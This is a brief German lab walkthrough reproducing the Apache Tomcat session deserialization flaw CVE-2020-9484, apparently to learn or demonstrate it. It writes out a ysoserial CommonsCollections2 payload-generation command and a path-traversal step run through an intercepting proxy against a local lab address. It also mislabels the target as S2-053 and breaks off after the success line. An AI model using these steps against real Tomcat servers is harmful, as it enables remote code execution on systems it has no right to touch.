
Reproduktion der Apache-Tomcat-Session-Deserialisierungs-Codeausführungs-Schwachstelle mit Kali 2.0
Reproduktion der Apache Tomcat Session Deserialization Code Execution Schwachstelle CVE-2020-9484 mit Kali 2.0
/yourtomcatdir/bin/startup.sh
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections2 "touch /tmp/9484" > /tmp/22222.session
Zuerst auf S2-053 zugreifen, um zu prüfen, ob es normal gestartet ist:
http://192.168.152.128:8080/s2-053/
Erneut zugreifen, Paket abfangen und Pfad-Traversal mit Intruder durchführen


Befehlsausführung erfolgreich:
